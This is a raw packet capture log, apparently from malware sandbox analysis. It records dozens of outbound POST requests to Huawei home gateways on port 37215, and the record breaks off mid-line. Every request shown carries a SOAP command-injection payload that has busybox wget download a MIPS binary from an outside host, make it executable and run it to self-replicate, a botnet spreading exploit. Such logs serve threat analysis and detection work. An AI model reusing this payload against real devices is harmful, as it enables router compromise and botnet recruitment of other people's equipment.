                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1366192.168.2.133667041.250.98.18937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.559098959 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1367192.168.2.1333056197.67.246.19837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.559115887 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1368192.168.2.1340666157.248.201.837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.559134007 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1369192.168.2.135971047.132.82.1037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.559150934 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1370192.168.2.134465245.33.228.1337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.559170961 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1371192.168.2.135099441.114.109.10337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.559205055 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1372192.168.2.1334910197.4.17.5337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.559237003 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1373192.168.2.135723680.195.33.12037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.559242964 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1374192.168.2.1350528183.210.60.12137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.559298038 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1375192.168.2.135874641.31.245.19737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.559354067 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 